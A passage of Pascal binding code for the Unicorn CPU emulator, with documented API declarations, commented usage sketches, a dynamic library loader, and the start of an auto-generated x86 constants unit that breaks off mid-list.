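  (* Example (editor's sketch, assuming the library loaded successfully):
     sanity-check the loaded libunicorn before use. UC_MAKE_VERSION is declared
     later in this unit; UC_API_MAJOR/UC_API_MINOR and UC_ARCH_X86 come from
     the UnicornConst unit.

       var
         major, minor : Cardinal;
       begin
         uc_version(major, minor);
         if UC_MAKE_VERSION(major, minor) <> UC_MAKE_VERSION(UC_API_MAJOR, UC_API_MINOR) then
           WriteLn('warning: library version differs from binding version');
         if not uc_arch_supported(UC_ARCH_X86) then
           WriteLn('x86 support is not compiled into this libunicorn');
       end;
  *)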
  (* Create new instance of unicorn engine.
     @arch: architecture type (UC_ARCH_*)
     @mode: hardware mode. This is a combination of UC_MODE_* values.
     @uc: pointer to uc_engine, which will be updated at return time
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_open : function (arch : uc_arch; mode : uc_mode; var uc : uc_engine) : uc_err; cdecl;

  (* Close a UC instance: this MUST be done to release the handle when it is
     no longer used.
     NOTE: this must be called only when there is no longer any usage of
     Unicorn. The reason is that this API releases some cached memory, so
     accessing any Unicorn API after uc_close() might crash your application.
     After this, @uc is invalid, and no longer usable.
     @uc: pointer to a handle returned by uc_open()
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_close : function (uc : uc_engine) : uc_err; cdecl;

  (* Query internal status of engine.
     @uc: handle returned by uc_open()
     @type: query type. See uc_query_type
     @result: pointer to a variable that receives the queried status.
     @return: error code of uc_err enum type (UC_ERR_*, see above) *)
  uc_query : function (uc : uc_engine; qtype : uc_query_type; result : PCardinal) : uc_err ; cdecl;

  (* Report the last error number when some API function fails.
     Like glibc's errno, uc_errno might not retain its old value once accessed.
     @uc: handle returned by uc_open()
     @return: error code of uc_err enum type (UC_ERR_*, see above) *)
  uc_errno : function (uc : uc_engine) : uc_err; cdecl;

  (* Return a string describing the given error code.
     @code: error code (see UC_ERR_*)
     @return: returns a pointer to a string that describes the error code
     passed in the argument @code *)
  uc_strerror : function (code : uc_err) : PAnsiChar; cdecl;

  (* Write to register.
     @uc: handle returned by uc_open()
     @regid: register ID that is to be modified.
     @value: pointer to the value that will be set to register @regid.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_reg_write : function (uc : uc_engine; regid : Integer; const value : Pointer) : uc_err; cdecl;

  (* Read register value.
     @uc: handle returned by uc_open()
     @regid: register ID that is to be retrieved.
     @value: pointer to a variable storing the register value.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_reg_read : function (uc : uc_engine; regid : Integer; value : Pointer) : uc_err; cdecl ;

  (* Write multiple register values.
     @uc: handle returned by uc_open()
     @regs: array of register IDs to store
     @value: pointer to array of register values
     @count: length of both *regs and *vals
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_reg_write_batch : function(uc : uc_engine; regs : PIntegerArray; const values : Pointer; count : Integer) : uc_err; cdecl;

  (* Read multiple register values.
     @uc: handle returned by uc_open()
     @regs: array of register IDs to retrieve
     @value: pointer to array of values to hold registers
     @count: length of both *regs and *vals
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_reg_read_batch : function(uc : uc_engine; regs : PIntegerArray; var values : Pointer; count : integer) : uc_err; cdecl;
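  (* Example (editor's sketch): open an engine and round-trip a register value
     through uc_reg_write()/uc_reg_read(). UC_X86_REG_ECX comes from X86Const;
     the buffer must match the register width (ECX is 32 bits). Error handling
     is trimmed for brevity.

       var
         uc  : uc_engine;
         ecx : UInt32;
       begin
         if uc_open(UC_ARCH_X86, UC_MODE_32, uc) <> UC_ERR_OK then Exit;
         ecx := $12345678;
         uc_reg_write(uc, UC_X86_REG_ECX, @ecx);
         ecx := 0;
         uc_reg_read(uc, UC_X86_REG_ECX, @ecx); // ecx = $12345678 again
         uc_close(uc);
       end;
  *)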
  (* Write to a range of bytes in memory.
     @uc: handle returned by uc_open()
     @address: starting memory address of bytes to set.
     @bytes: pointer to a variable containing data to be written to memory.
     @size: size of memory to write to.
     NOTE: @bytes must be big enough to contain @size bytes.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_mem_write_ : function (uc : uc_engine; address : UInt64; const bytes : Pointer; size : Cardinal) : uc_err; cdecl;

  (* Read a range of bytes in memory.
     @uc: handle returned by uc_open()
     @address: starting memory address of bytes to get.
     @bytes: pointer to a variable containing data copied from memory.
     @size: size of memory to read.
     NOTE: @bytes must be big enough to contain @size bytes.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_mem_read_ : function (uc : uc_engine; address : UInt64; bytes : Pointer; size : Cardinal) : uc_err; cdecl;

  (* Emulate machine code in a specific duration of time.
     @uc: handle returned by uc_open()
     @begin: address where emulation starts
     @until: address where emulation stops (i.e. when this address is hit)
     @timeout: duration to emulate the code (in microseconds). When this value
     is 0, we will emulate the code in infinite time, until the code is
     finished.
     @count: the number of instructions to be emulated. When this value is 0,
     we will emulate all the code available, until the code is finished.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_emu_start : function (uc : uc_engine; _begin, _until , timeout : UInt64; count : Cardinal) : uc_err; cdecl;

  (* Stop emulation (which was started by the uc_emu_start() API).
     This is typically called from callback functions registered via tracing
     APIs.
     NOTE: for now, this will stop the execution only after the current block.
     @uc: handle returned by uc_open()
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_emu_stop : function (uc : uc_engine) : uc_err; cdecl;

  (* Register callback for a hook event. The callback will be run when the
     hook event is hit.
     @uc: handle returned by uc_open()
     @hh: hook handle returned from this registration. To be used in the
     uc_hook_del() API
     @type: hook type
     @callback: callback to be run when instruction is hit
     @user_data: user-defined data. This will be passed to the callback
     function in its last argument @user_data
     @begin: start address of the area where the callback is in effect (inclusive)
     @end: end address of the area where the callback is in effect (inclusive)
     NOTE 1: the callback is called only if the related address is in range [@begin, @end]
     NOTE 2: if @begin > @end, the callback is called whenever this hook type is triggered
     @...: variable arguments (depending on @type)
     NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT)
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_hook_add : function (uc : uc_engine; var hh : uc_hook; _type : integer; callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; args : Array Of Const) : uc_err; cdecl;

  //uc_hook_add_1 : function (uc : uc_engine; var hh : uc_hook; _type : integer;
  //  callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1 : integer) : uc_err; cdecl;
  //
  //uc_hook_add_2 : function (uc : uc_engine; var hh : uc_hook; _type : integer;
  //  callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1, arg2 : UInt64) : uc_err; cdecl;
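  (* Example (editor's sketch): installing the HookCode callback sketched
     earlier and running emulation. It assumes uc holds an open engine with
     code already mapped at ADDRESS for CODE_SIZE bytes (see uc_mem_map()
     below); both names are placeholders. Passing _Begin = 1 and _End = 0
     makes the hook fire on every instruction, per NOTE 2 above, and the empty
     open array is the variable-argument list, unused for UC_HOOK_CODE.

       var
         hh : uc_hook;
       begin
         uc_hook_add(uc, hh, UC_HOOK_CODE, @HookCode, nil, 1, 0, []);
         uc_emu_start(uc, ADDRESS, ADDRESS + CODE_SIZE, 0, 0);
       end;
  *)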
  (* Unregister (remove) a hook callback.
     This API removes the hook callback registered by uc_hook_add().
     NOTE: this should be called only when you no longer want to trace. After
     this, @hh is invalid, and no longer usable.
     @uc: handle returned by uc_open()
     @hh: handle returned by uc_hook_add()
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_hook_del : function (uc : uc_engine; hh : uc_hook) : uc_err; cdecl ;

  (* Map memory in for emulation.
     This API adds a memory region that can be used by emulation.
     @uc: handle returned by uc_open()
     @address: starting address of the new memory region to be mapped in. This
     address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
     @size: size of the new memory region to be mapped in. This size must be a
     multiple of 4KB, or this will return with UC_ERR_ARG error.
     @perms: Permissions for the newly mapped region. This must be some
     combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will
     return with UC_ERR_ARG error.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_mem_map : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl;

  (* Map existing host memory in for emulation.
     This API adds a memory region that can be used by emulation.
     @uc: handle returned by uc_open()
     @address: starting address of the new memory region to be mapped in. This
     address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
     @size: size of the new memory region to be mapped in. This size must be a
     multiple of 4KB, or this will return with UC_ERR_ARG error.
     @perms: Permissions for the newly mapped region. This must be some
     combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will
     return with UC_ERR_ARG error.
     @ptr: pointer to host memory backing the newly mapped memory. This host
     memory is expected to be an equal or larger size than provided, and be
     mapped with at least PROT_READ | PROT_WRITE. If it is not, the resulting
     behavior is undefined.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_mem_map_ptr : function(uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32; ptr : Pointer) : uc_err; cdecl;

  (* Unmap a region of emulation memory.
     This API deletes a memory mapping from the emulation memory space.
     @handle: handle returned by uc_open()
     @address: starting address of the memory region to be unmapped. This
     address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
     @size: size of the memory region to be modified. This size must be a
     multiple of 4KB, or this will return with UC_ERR_ARG error.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_mem_unmap : function (uc : uc_engine; address : UInt64; size : Cardinal) : uc_err; cdecl ;
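  (* Example (editor's sketch): a typical map / write / read / unmap cycle.
     BASE is a placeholder and SomeCode a hypothetical byte array; both the
     address and the size must be 4KB-aligned, per the notes above. Error
     handling is trimmed.

       const
         BASE = $100000;
         SIZE = $1000;
       var
         buf : array[0..3] of Byte;
       begin
         uc_mem_map(uc, BASE, SIZE, UC_PROT_ALL);
         uc_mem_write_(uc, BASE, @SomeCode[0], Length(SomeCode));
         uc_mem_read_(uc, BASE, @buf[0], SizeOf(buf));
         uc_mem_unmap(uc, BASE, SIZE);
       end;
  *)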
  (* Set memory permissions for emulation memory.
     This API changes permissions on an existing memory region.
     @handle: handle returned by uc_open()
     @address: starting address of the memory region to be modified. This
     address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
     @size: size of the memory region to be modified. This size must be a
     multiple of 4KB, or this will return with UC_ERR_ARG error.
     @perms: New permissions for the mapped region. This must be some
     combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will
     return with UC_ERR_ARG error.
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_mem_protect : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl ;

  (* Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr()
     This API allocates memory for @regions, and the user must free this
     memory later with uc_free() to avoid leaking memory.
     NOTE: memory regions may be split by uc_mem_unmap()
     @uc: handle returned by uc_open()
     @regions: pointer to an array of uc_mem_region struct. >> Check
     "Puc_mem_regionArray". This is allocated by Unicorn, and must be freed by
     the user later.
     @count: pointer to number of struct uc_mem_region contained in @regions
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_mem_regions : function(uc : uc_engine; var regions : Puc_mem_regionArray; count : PUInt32) : uc_err; cdecl ;

  (* Allocate a region that can be used with uc_context_{save,restore} to
     perform quick save/rollback of the CPU context, which includes registers
     and some internal metadata. Contexts may not be shared across engine
     instances with differing arches or modes.
     @uc: handle returned by uc_open()
     @context: pointer to a uc_context. This will be updated with the pointer
     to the new context on successful return of this function. Later, this
     allocated memory must be freed with uc_free().
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_context_alloc : function ( uc : uc_engine; var context : uc_context) : uc_err; cdecl ;

  (* Free the memory allocated by uc_context_alloc & uc_mem_regions.
     @mem: memory allocated by uc_context_alloc (returned in *context), or by
     uc_mem_regions (returned in *regions)
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_free : function (context : Pointer) : uc_err; cdecl ;

  (* Save a copy of the internal CPU context.
     This API should be used to efficiently make or update a saved copy of the
     internal CPU state.
     @uc: handle returned by uc_open()
     @context: handle returned by uc_context_alloc()
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_context_save : function ( uc : uc_engine; context : uc_context) : uc_err; cdecl;

  (* Restore the current CPU context from a saved copy.
     This API should be used to roll the CPU context back to a previous state
     saved by uc_context_save().
     @uc: handle returned by uc_open()
     @context: handle returned by uc_context_alloc that has been used with
     uc_context_save
     @return UC_ERR_OK on success, or other value on failure (refer to the
     uc_err enum for detailed error). *)
  uc_context_restore : function(uc : uc_engine; context : uc_context) : uc_err; cdecl;
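  (* Example (editor's sketch): snapshot the CPU state, run some code, then
     roll back, using the context APIs declared above. ADDRESS and CODE_SIZE
     are placeholders for code that is already mapped into the engine.

       var
         ctx : uc_context;
       begin
         uc_context_alloc(uc, ctx);
         uc_context_save(uc, ctx);                             // snapshot registers
         uc_emu_start(uc, ADDRESS, ADDRESS + CODE_SIZE, 0, 0);
         uc_context_restore(uc, ctx);                          // roll registers back
         uc_free(ctx);                                         // release the snapshot
       end;
  *)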
{============================= Global Functions ================================}

//function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer;
//  callback : Pointer; user_data : Pointer; mBegin, mEnd : UInt64) : uc_err; overload;
//function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer;
//  callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1 : UInt64) : uc_err; overload;
//function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer;
//  callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1, arg2 : UInt64) : uc_err; overload;

function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal;

implementation

function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal;
begin
  Result := ((major shl 8) + minor);
end;

var
  UC_Handle : {$IFDEF FPC}dynlibs.{$ENDIF}HModule;

function dyn_loadfunc(name : {$IFDEF FPC}string{$ELSE}PChar{$ENDIF}) : Pointer;
begin
  Result := {$IFDEF FPC}dynlibs.{$ENDIF}GetProcAddress(UC_Handle,name);
end;

function loadUC(): Boolean;
var
  LastError : String;
begin
  Result := false;
  UC_Handle := {$IFDEF FPC}dynlibs.{$ENDIF}LoadLibrary(UNICORN_LIB);
  if UC_Handle <> 0 then
  begin
    @uc_version := dyn_loadfunc('uc_version');
    if (@uc_version = nil) then exit(false);
    @uc_arch_supported := dyn_loadfunc('uc_arch_supported');
    if (@uc_arch_supported = nil) then exit(false);
    @uc_open := dyn_loadfunc('uc_open');
    if (@uc_open = nil) then exit(false);
    @uc_close := dyn_loadfunc('uc_close');
    if (@uc_close = nil) then exit(false);
    @uc_query := dyn_loadfunc('uc_query');
    if (@uc_query = nil) then exit(false);
    @uc_errno := dyn_loadfunc('uc_errno');
    if (@uc_errno = nil) then exit(false);
    @uc_strerror := dyn_loadfunc('uc_strerror');
    if (@uc_strerror = nil) then exit(false);
    @uc_reg_write := dyn_loadfunc('uc_reg_write');
    if (@uc_reg_write = nil) then exit(false);
    @uc_reg_read := dyn_loadfunc('uc_reg_read');
    if (@uc_reg_read = nil) then exit(false);
    @uc_reg_write_batch := dyn_loadfunc('uc_reg_write_batch');
    if (@uc_reg_write_batch = nil) then exit(false);
    @uc_reg_read_batch := dyn_loadfunc('uc_reg_read_batch');
    if (@uc_reg_read_batch = nil) then exit(false);
    @uc_mem_write_ := dyn_loadfunc('uc_mem_write');
    if (@uc_mem_write_ = nil) then exit(false);
    @uc_mem_read_ := dyn_loadfunc('uc_mem_read');
    if (@uc_mem_read_ = nil) then exit(false);
    @uc_emu_start := dyn_loadfunc('uc_emu_start');
    if (@uc_emu_start = nil) then exit(false);
    @uc_emu_stop := dyn_loadfunc('uc_emu_stop');
    if (@uc_emu_stop = nil) then exit(false);
    @uc_hook_add := dyn_loadfunc('uc_hook_add');
    if (@uc_hook_add = nil) then exit(false);
    @uc_hook_del := dyn_loadfunc('uc_hook_del');
    if (@uc_hook_del = nil) then exit(false);
    @uc_mem_map := dyn_loadfunc('uc_mem_map');
    if (@uc_mem_map = nil) then exit(false);
    @uc_mem_map_ptr := dyn_loadfunc('uc_mem_map_ptr');
    if (@uc_mem_map_ptr = nil) then exit(false);
    @uc_mem_unmap := dyn_loadfunc('uc_mem_unmap');
    if (@uc_mem_unmap = nil) then exit(false);
    @uc_mem_protect := dyn_loadfunc('uc_mem_protect');
    if (@uc_mem_protect = nil) then exit(false);
    @uc_mem_regions := dyn_loadfunc('uc_mem_regions');
    if (@uc_mem_regions = nil) then exit(false);
    @uc_context_alloc := dyn_loadfunc('uc_context_alloc');
    if (@uc_context_alloc = nil) then exit(false);
    @uc_context_save := dyn_loadfunc('uc_context_save');
    if (@uc_context_save = nil) then exit(false);
    @uc_context_restore := dyn_loadfunc('uc_context_restore');
    if (@uc_context_restore = nil) then exit(false);
    @uc_free := dyn_loadfunc('uc_free');
    if (@uc_free = nil) then exit(false);

    Result := true;
  end
  else
  begin
    {$IFDEF FPC}TextColor(LightRed);{$ENDIF}
    LastError := {$IFDEF FPC}GetLoadErrorStr;{$ELSE}
      {$ifdef mswindows} SysErrorMessage(GetLastError,UC_Handle); SetLastError(0); {$ENDIF}
    {$ENDIF}
    WriteLn('error while loading unicorn library : ',LastError,#10);
    {$IFDEF FPC}NormVideo;{$ENDIF}
  end;
end;

procedure FreeUC();
begin
  if UC_Handle <> 0 then
    {$IFDEF FPC}dynlibs.{$ENDIF}FreeLibrary(UC_Handle);
end;

initialization
  UC_Handle := 0;
  if not loadUC then halt(0);

finalization
  FreeUC();

end.

// ===== File: unicorn-2.1.1/bindings/pascal/unicorn/X86Const.pas =====
// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT
unit X86Const;

interface

const
// X86 CPU
UC_CPU_X86_QEMU64 = 0; UC_CPU_X86_PHENOM = 1; UC_CPU_X86_CORE2DUO = 2; UC_CPU_X86_KVM64 = 3; UC_CPU_X86_QEMU32 = 4; UC_CPU_X86_KVM32 = 5; UC_CPU_X86_COREDUO = 6; UC_CPU_X86_486 = 7; UC_CPU_X86_PENTIUM = 8; UC_CPU_X86_PENTIUM2 = 9; UC_CPU_X86_PENTIUM3 = 10; UC_CPU_X86_ATHLON = 11; UC_CPU_X86_N270 = 12; UC_CPU_X86_CONROE = 13; UC_CPU_X86_PENRYN = 14; UC_CPU_X86_NEHALEM = 15; UC_CPU_X86_WESTMERE = 16; UC_CPU_X86_SANDYBRIDGE = 17; UC_CPU_X86_IVYBRIDGE = 18; UC_CPU_X86_HASWELL = 19; UC_CPU_X86_BROADWELL = 20; UC_CPU_X86_SKYLAKE_CLIENT = 21; UC_CPU_X86_SKYLAKE_SERVER = 22; UC_CPU_X86_CASCADELAKE_SERVER = 23; UC_CPU_X86_COOPERLAKE = 24; UC_CPU_X86_ICELAKE_CLIENT = 25; UC_CPU_X86_ICELAKE_SERVER = 26; UC_CPU_X86_DENVERTON = 27; UC_CPU_X86_SNOWRIDGE = 28; UC_CPU_X86_KNIGHTSMILL = 29; UC_CPU_X86_OPTERON_G1 = 30; UC_CPU_X86_OPTERON_G2 = 31; UC_CPU_X86_OPTERON_G3 = 32; UC_CPU_X86_OPTERON_G4 = 33; UC_CPU_X86_OPTERON_G5 = 34; UC_CPU_X86_EPYC = 35; UC_CPU_X86_DHYANA = 36; UC_CPU_X86_EPYC_ROME = 37; UC_CPU_X86_ENDING = 38;

// X86 registers
UC_X86_REG_INVALID = 0; UC_X86_REG_AH = 1; UC_X86_REG_AL = 2; UC_X86_REG_AX = 3; UC_X86_REG_BH = 4; UC_X86_REG_BL = 5; UC_X86_REG_BP = 6; UC_X86_REG_BPL = 7; UC_X86_REG_BX = 8; UC_X86_REG_CH = 9; UC_X86_REG_CL = 10; UC_X86_REG_CS = 11; UC_X86_REG_CX = 12; UC_X86_REG_DH = 13; UC_X86_REG_DI = 14; UC_X86_REG_DIL = 15; UC_X86_REG_DL = 16; UC_X86_REG_DS = 17; UC_X86_REG_DX = 18; UC_X86_REG_EAX = 19; UC_X86_REG_EBP = 20; UC_X86_REG_EBX = 21; UC_X86_REG_ECX = 22; UC_X86_REG_EDI = 23; UC_X86_REG_EDX = 24; UC_X86_REG_EFLAGS = 25; UC_X86_REG_EIP = 26; UC_X86_REG_ES = 28; UC_X86_REG_ESI = 29; UC_X86_REG_ESP = 30; UC_X86_REG_FPSW = 31; UC_X86_REG_FS = 32; UC_X86_REG_GS = 33; UC_X86_REG_IP = 34; UC_X86_REG_RAX = 35; UC_X86_REG_RBP = 36; UC_X86_REG_RBX = 37; UC_X86_REG_RCX = 38; UC_X86_REG_RDI = 39; UC_X86_REG_RDX = 40; UC_X86_REG_RIP = 41; UC_X86_REG_RSI = 43; UC_X86_REG_RSP = 44; UC_X86_REG_SI = 45; UC_X86_REG_SIL =
46; UC_X86_REG_SP = 47; UC_X86_REG_SPL = 48; UC_X86_REG_SS = 49; UC_X86_REG_CR0 = 50; UC_X86_REG_CR1 = 51; UC_X86_REG_CR2 = 52; UC_X86_REG_CR3 = 53; UC_X86_REG_CR4 = 54; UC_X86_REG_CR8 = 58; UC_X86_REG_DR0 = 66; UC_X86_REG_DR1 = 67; UC_X86_REG_DR2 = 68; UC_X86_REG_DR3 = 69; UC_X86_REG_DR4 = 70; UC_X86_REG_DR5 = 71; UC_X86_REG_DR6 = 72; UC_X86_REG_DR7 = 73; UC_X86_REG_FP0 = 82; UC_X86_REG_FP1 = 83; UC_X86_REG_FP2 = 84; UC_X86_REG_FP3 = 85; UC_X86_REG_FP4 = 86; UC_X86_REG_FP5 = 87; UC_X86_REG_FP6 = 88; UC_X86_REG_FP7 = 89; UC_X86_REG_K0 = 90; UC_X86_REG_K1 = 91; UC_X86_REG_K2 = 92; UC_X86_REG_K3 = 93; UC_X86_REG_K4 = 94; UC_X86_REG_K5 = 95; UC_X86_REG_K6 = 96; UC_X86_REG_K7 = 97; UC_X86_REG_MM0 = 98; UC_X86_REG_MM1 = 99; UC_X86_REG_MM2 = 100; UC_X86_REG_MM3 = 101; UC_X86_REG_MM4 = 102; UC_X86_REG_MM5 = 103; UC_X86_REG_MM6 = 104; UC_X86_REG_MM7 = 105; UC_X86_REG_R8 = 106; UC_X86_REG_R9 = 107; UC_X86_REG_R10 = 108; UC_X86_REG_R11 = 109; UC_X86_REG_R12 = 110; UC_X86_REG_R13 = 111; UC_X86_REG_R14 = 112; UC_X86_REG_R15 = 113; UC_X86_REG_ST0 = 114; UC_X86_REG_ST1 = 115; UC_X86_REG_ST2 = 116; UC_X86_REG_ST3 = 117; UC_X86_REG_ST4 = 118; UC_X86_REG_ST5 = 119; UC_X86_REG_ST6 = 120; UC_X86_REG_ST7 = 121; UC_X86_REG_XMM0 = 122; UC_X86_REG_XMM1 = 123; UC_X86_REG_XMM2 = 124; UC_X86_REG_XMM3 = 125; UC_X86_REG_XMM4 = 126; UC_X86_REG_XMM5 = 127; UC_X86_REG_XMM6 = 128; UC_X86_REG_XMM7 = 129; UC_X86_REG_XMM8 = 130; UC_X86_REG_XMM9 = 131; UC_X86_REG_XMM10 = 132; UC_X86_REG_XMM11 = 133; UC_X86_REG_XMM12 = 134; UC_X86_REG_XMM13 = 135; UC_X86_REG_XMM14 = 136; UC_X86_REG_XMM15 = 137; UC_X86_REG_XMM16 = 138; UC_X86_REG_XMM17 = 139; UC_X86_REG_XMM18 = 140; UC_X86_REG_XMM19 = 141; UC_X86_REG_XMM20 = 142; UC_X86_REG_XMM21 = 143; UC_X86_REG_XMM22 = 144; UC_X86_REG_XMM23 = 145; UC_X86_REG_XMM24 = 146; UC_X86_REG_XMM25 = 147; UC_X86_REG_XMM26 = 148; UC_X86_REG_XMM27 = 149; UC_X86_REG_XMM28 = 150; UC_X86_REG_XMM29 = 151; UC_X86_REG_XMM30 = 152; UC_X86_REG_XMM31 = 153; UC_X86_REG_YMM0 = 154; UC_X86_REG_YMM1 = 155; UC_X86_REG_YMM2 = 156; UC_X86_REG_YMM3 = 157; UC_X86_REG_YMM4 = 158; UC_X86_REG_YMM5 = 159; UC_X86_REG_YMM6 = 160; UC_X86_REG_YMM7 = 161; UC_X86_REG_YMM8 = 162; UC_X86_REG_YMM9 = 163; UC_X86_REG_YMM10 = 164; UC_X86_REG_YMM11 = 165; UC_X86_REG_YMM12 = 166; UC_X86_REG_YMM13 = 167; UC_X86_REG_YMM14 = 168; UC_X86_REG_YMM15 = 169; UC_X86_REG_YMM16 = 170; UC_X86_REG_YMM17 = 171; UC_X86_REG_YMM18 = 172; UC_X86_REG_YMM19 = 173; UC_X86_REG_YMM20 = 174; UC_X86_REG_YMM21 = 175; UC_X86_REG_YMM22 = 176; UC_X86_REG_YMM23 = 177; UC_X86_REG_YMM24 = 178; UC_X86_REG_YMM25 = 179; UC_X86_REG_YMM26 = 180; UC_X86_REG_YMM27 = 181; UC_X86_REG_YMM28 = 182; UC_X86_REG_YMM29 = 183; UC_X86_REG_YMM30 = 184; UC_X86_REG_YMM31 = 185; UC_X86_REG_ZMM0 = 186; UC_X86_REG_ZMM1 = 187; UC_X86_REG_ZMM2 = 188; UC_X86_REG_ZMM3 = 189; UC_X86_REG_ZMM4 = 190; UC_X86_REG_ZMM5 = 191; UC_X86_REG_ZMM6 = 192; UC_X86_REG_ZMM7 = 193; UC_X86_REG_ZMM8 = 194; UC_X86_REG_ZMM9 = 195; UC_X86_REG_ZMM10 = 196; UC_X86_REG_ZMM11 = 197; UC_X86_REG_ZMM12 = 198; UC_X86_REG_ZMM13 = 199; UC_X86_REG_ZMM14 = 200; UC_X86_REG_ZMM15 = 201; UC_X86_REG_ZMM16 = 202; UC_X86_REG_ZMM17 = 203; UC_X86_REG_ZMM18 = 204; UC_X86_REG_ZMM19 = 205; UC_X86_REG_ZMM20 = 206; UC_X86_REG_ZMM21 = 207; UC_X86_REG_ZMM22 = 208; UC_X86_REG_ZMM23 = 209; UC_X86_REG_ZMM24 = 210; UC_X86_REG_ZMM25 = 211; UC_X86_REG_ZMM26 = 212; UC_X86_REG_ZMM27 = 213; UC_X86_REG_ZMM28 = 214; UC_X86_REG_ZMM29 = 215; UC_X86_REG_ZMM30 = 216; UC_X86_REG_ZMM31 = 217; UC_X86_REG_R8B = 218; UC_X86_REG_R9B = 219; UC_X86_REG_R10B = 220; 
UC_X86_REG_R11B = 221; UC_X86_REG_R12B = 222; UC_X86_REG_R13B = 223; UC_X86_REG_R14B = 224; UC_X86_REG_R15B = 225; UC_X86_REG_R8D = 226; UC_X86_REG_R9D = 227; UC_X86_REG_R10D = 228; UC_X86_REG_R11D = 229; UC_X86_REG_R12D = 230; UC_X86_REG_R13D = 231; UC_X86_REG_R14D = 232; UC_X86_REG_R15D = 233; UC_X86_REG_R8W = 234; UC_X86_REG_R9W = 235; UC_X86_REG_R10W = 236; UC_X86_REG_R11W = 237; UC_X86_REG_R12W = 238; UC_X86_REG_R13W = 239; UC_X86_REG_R14W = 240; UC_X86_REG_R15W = 241; UC_X86_REG_IDTR = 242; UC_X86_REG_GDTR = 243; UC_X86_REG_LDTR = 244; UC_X86_REG_TR = 245; UC_X86_REG_FPCW = 246; UC_X86_REG_FPTAG = 247; UC_X86_REG_MSR = 248; UC_X86_REG_MXCSR = 249; UC_X86_REG_FS_BASE = 250; UC_X86_REG_GS_BASE = 251; UC_X86_REG_FLAGS = 252; UC_X86_REG_RFLAGS = 253; UC_X86_REG_FIP = 254; UC_X86_REG_FCS = 255; UC_X86_REG_FDP = 256; UC_X86_REG_FDS = 257; UC_X86_REG_FOP = 258; UC_X86_REG_ENDING = 259; // X86 instructions UC_X86_INS_INVALID = 0; UC_X86_INS_AAA = 1; UC_X86_INS_AAD = 2; UC_X86_INS_AAM = 3; UC_X86_INS_AAS = 4; UC_X86_INS_FABS = 5; UC_X86_INS_ADC = 6; UC_X86_INS_ADCX = 7; UC_X86_INS_ADD = 8; UC_X86_INS_ADDPD = 9; UC_X86_INS_ADDPS = 10; UC_X86_INS_ADDSD = 11; UC_X86_INS_ADDSS = 12; UC_X86_INS_ADDSUBPD = 13; UC_X86_INS_ADDSUBPS = 14; UC_X86_INS_FADD = 15; UC_X86_INS_FIADD = 16; UC_X86_INS_FADDP = 17; UC_X86_INS_ADOX = 18; UC_X86_INS_AESDECLAST = 19; UC_X86_INS_AESDEC = 20; UC_X86_INS_AESENCLAST = 21; UC_X86_INS_AESENC = 22; UC_X86_INS_AESIMC = 23; UC_X86_INS_AESKEYGENASSIST = 24; UC_X86_INS_AND = 25; UC_X86_INS_ANDN = 26; UC_X86_INS_ANDNPD = 27; UC_X86_INS_ANDNPS = 28; UC_X86_INS_ANDPD = 29; UC_X86_INS_ANDPS = 30; UC_X86_INS_ARPL = 31; UC_X86_INS_BEXTR = 32; UC_X86_INS_BLCFILL = 33; UC_X86_INS_BLCI = 34; UC_X86_INS_BLCIC = 35; UC_X86_INS_BLCMSK = 36; UC_X86_INS_BLCS = 37; UC_X86_INS_BLENDPD = 38; UC_X86_INS_BLENDPS = 39; UC_X86_INS_BLENDVPD = 40; UC_X86_INS_BLENDVPS = 41; UC_X86_INS_BLSFILL = 42; UC_X86_INS_BLSI = 43; 